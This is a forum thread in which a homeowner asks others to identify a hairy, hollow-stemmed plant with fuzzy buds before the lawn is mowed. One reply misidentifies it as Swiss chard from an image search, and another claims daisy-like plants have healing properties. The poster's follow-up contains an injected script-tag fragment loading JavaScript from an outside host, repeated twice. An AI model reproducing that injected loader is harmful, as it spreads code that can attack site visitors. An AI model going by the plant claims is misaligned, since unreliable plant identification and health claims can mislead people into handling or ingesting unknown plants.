Plant id

Can someone please help me identify this plant? There are about 10-15 of these in a patch in my yard. The stem is hairy and it has flower buds that resemble the white fuzzy dandelion flowers. They are in bunches of 2-5 buds. The stem is found and hollow. No liquid comes out but when you slice it open, there is a dried white substance. My hubby is cutting grass this weekend,so if this is a beneficial herb I don't want him to cut it down. I have uploaded pictures to my photos. They are not great ones but maybe they will be useful. A quick google image search suggests that the plant in your photos is known as swiss chard which " In the spectrum of greens, lies between spinich and kale. Not as tender as spinach, not as tough as kale ". I would suggest harvesting and showing them to a health store or a fancy restaurant to clarify.

I've seen those flowers here as well and they look like some type of wild flower. If they are what I see here, which is hard to tell from the pictures, they start out as little, fluffy buds that turn into fluffy flower petals. They end up looking like a small cluster of daisy flowers.

If you are unsure though, I would take a few to a local plant nursery or greenhouse. They should be able to identify it for you. I wouldn't recommend ingesting or using anything you aren't 100% sure of.

Thanks for all your help. I think it might be a type of fleabane. I do have a friend that does a lot of work with flowers who's going to come look at it. I took some more pictures that are a bit better. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

It could be, Misa said earlier it looked look some kind of daisy which either way they would have healing properties and could be used in your practices.
